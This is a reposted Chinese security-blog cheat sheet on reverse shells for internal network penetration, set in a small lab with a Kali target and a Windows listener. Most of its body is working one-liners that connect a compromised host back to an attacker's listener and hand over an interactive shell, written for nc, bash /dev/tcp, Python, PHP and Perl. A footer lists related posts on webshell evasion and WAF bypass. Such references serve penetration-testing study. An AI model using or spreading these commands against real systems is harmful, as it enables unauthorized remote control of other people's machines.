内网渗透:nc反弹shell总结

admin 2022年3月30日10:04:03评论333 views字数 1529阅读5分5秒阅读模式

1、实验环境

Kali:192.168.32.132 //模拟靶机
Windows:192.168.32.1 //模拟公网vps

2、若靶机上存在nc,获取反向shell:

vps攻击机:nc -lvp 9999      // 监听9999端口靶机:nc 1.1.1.1 9999 -e /bin/bash  // Linux正向连接公网vps1.1.1.1的9999端口     nc 1.1.1.1 9999 -e c:windowssystem32cmd.exe  // Windows

内网渗透:nc反弹shell总结内网渗透:nc反弹shell总结

3、若靶机上不存在nc,可用如下几种方式进行代替:

(1) Bash反弹shell
vps攻击机:nc -lvp 6666靶机:bash -I >& /dev/tcp/192.168.32.1/6666 0>&1

内网渗透:nc反弹shell总结内网渗透:nc反弹shell总结

(2)靶机存在Python环境,Python反弹shell
vps攻击机:nc -lvp 6666靶机:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.1",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


内网渗透:nc反弹shell总结
内网渗透:nc反弹shell总结

(3)靶机存在PHP环境,PHP反向shell:
vps攻击机:nc -lvp 6666靶机:php -r '$sock=fsockopen("192.168.32.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

内网渗透:nc反弹shell总结内网渗透:nc反弹shell总结

(4)靶机存在Perl环境,Perl反弹shell:
Vps攻击机:nc -lvp 6666靶机:perl -e 'use Socket; $i="192.168.32.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

内网渗透:nc反弹shell总结
内网渗透:nc反弹shell总结

原文链接:https://blog.csdn.net/weixin_42652002/article/details/112132466?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromMachineLearnPai2%7Edefault-2.control


历史文章推荐:

XSS 实战思路总结

内网信息收集总结

xss攻击、绕过最全总结

一些webshell免杀的技巧

命令执行写webshell总结

SQL手工注入总结 必须收藏

后台getshell常用技巧总结

web渗透之发现内网有大鱼

蚁剑特征性信息修改简单过WAF

内网渗透之域渗透命令执行总结

[WEB安全]Weblogic漏洞总结


查看更多精彩内容,还请关注橘猫学安全

每日坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽内网渗透:nc反弹shell总结

原文始发于微信公众号(橘猫学安全):内网渗透:nc反弹shell总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月30日10:04:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透:nc反弹shell总结https://cn-sec.com/archives/853568.html

发表评论

匿名网友 填写信息